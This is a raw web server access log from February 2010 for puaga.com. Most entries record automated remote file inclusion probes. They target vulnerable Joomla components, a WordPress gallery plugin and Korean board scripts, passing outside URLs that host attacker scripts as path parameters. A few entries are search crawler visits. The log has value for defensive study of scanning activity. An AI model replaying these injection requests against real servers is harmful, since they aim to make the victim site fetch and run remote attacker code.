89.221.175.32 - - [18/Feb/2010:05:59:30 -0800] "GET /logs/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:59:54 -0800] "GET /logs/access_100210.log%20%20/myevent.php?myevent_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:00:16 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:00:16 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:00:17 -0800] "GET /logs/access_100114.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:00:22 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:00:22 -0800] "GET /logs/access_100114.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:00:25 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:06:00:26 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:06:00:26 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:06:00:26 -0800] "GET /logs/access_100129.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:00:31 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:00:31 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:00:31 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:06:00:32 -0800] "GET /logs/access_100202.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:06:01:20 -0800] "GET /logs/access_100128.log//delete_all.php?board_skin_path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:06:01:20 -0800] "GET /delete_all.php?board_skin_path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:06:01:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:01:29 -0800] "GET /logs/access_100117.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [18/Feb/2010:06:02:00 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [18/Feb/2010:06:02:00 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [18/Feb/2010:06:02:00 -0800] "GET /logs/access_100126.log%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:06:02:07 -0800] "GET /logs/access_100117.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [18/Feb/2010:06:02:12 -0800] "GET /logs/access_100201.log%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:02:37 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:02:37 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:02:38 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:03:00 -0800] "GET /logs/access_100115.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:03:12 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:03:39 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:03:52 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:03:52 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:03:52 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:04:00 -0800] "GET /logs/access_100122.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:05:29 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:05:29 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:05:29 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:05:31 -0800] "GET /logs/access_100107.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [18/Feb/2010:06:05:33 -0800] "GET /logs/access_100121.log/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [18/Feb/2010:06:05:34 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:05:37 -0800] "GET /logs/access_100122.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:05:39 -0800] "GET /logs/access_091031.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:05:39 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_091031.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:05:39 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:06:05:40 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_091031.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:06:19 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:06:19 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:06:19 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:06:06:25 -0800] "GET /logs/access_100112.log/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:06:06:25 -0800] "GET /logs/access_100103.log/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:06:31 -0800] "GET /logs/access_100122.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [18/Feb/2010:06:06:56 -0800] "GET /module/view?id=setup HTTP/1.0" 200 4252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [18/Feb/2010:06:06:57 -0800] "GET /themes/retro.css HTTP/1.0" 404 5258 "http://puaga.com/module/view?id=setup" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
219.94.194.248 - - [18/Feb/2010:06:07:08 -0800] "GET /logs/access_100126.log%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:07:08 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:07:08 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:07:18 -0800] "GET /logs/access_100201.log%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:08:02 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:08:07 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:08:07 -0800] "GET /logs/access_100126.log%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:08:08 -0800] "GET /logs/access_100201.log%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:09:28 -0800] "GET /logs/access_100129.log/myevent.php?myevent_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:06:09:46 -0800] "GET /logs/access_100128.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:06:10:36 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:06:10:36 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:06:10:44 -0800] "GET /logs/access_100117.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:10:51 -0800] "GET /logs/access_100210.log/myevent.php?myevent_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:06:11:19 -0800] "GET /logs/access_100128.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:12:34 -0800] "GET /logs/access_100112.log/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:12:35 -0800] "GET /logs/access_100103.log/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:06:13:24 -0800] "GET /logs/access_100123.log/?sourcedir=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:06:13:24 -0800] "GET /logs/?sourcedir=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:06:13:25 -0800] "GET /?sourcedir=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:13:29 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:13:29 -0800] "GET /logs/access_100201.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:13:30 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [18/Feb/2010:06:13:31 -0800] "GET /simplepack/grader/archive/SimpleGrader1.0.0SetupWin32.exe HTTP/1.0" 200 1422937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
123.143.29.250 - - [18/Feb/2010:06:13:50 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:13:50 -0800] "GET /logs/access_100201.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:13:51 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:15:35 -0800] "GET /errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:06:15:35 -0800] "GET /logs/errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:15:40 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:15:40 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:15:40 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:06:16:00 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:06:16:29 -0800] "GET /logs/access_100201.log/?sourcedir=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:35 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:35 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:35 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:38 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:38 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:38 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:43 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:18:44 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:19:51 -0800] "GET /logs/access_100126.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:19:51 -0800] "GET /logs/access_100201.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:06:20:23 -0800] "GET /logs/access_100122.log%20%20//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:06:20:23 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:06:20:23 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:06:20:28 -0800] "GET /logs/access_100205.log%20%20//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:20:43 -0800] "GET /logs/access_100126.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:06:20:43 -0800] "GET /logs/access_100201.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:21:06 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:21:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:21:06 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:06:21:11 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:06:21:11 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:06:21:25 -0800] "GET /logs/access_100111.log//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:06:21:28 -0800] "GET /logs/access_100120.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.22 - - [18/Feb/2010:06:21:57 -0800] "GET /logs/access_100202.log=http://www.colledge-xxi.ru//cmdstate.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:06:23:20 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:06:23:20 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
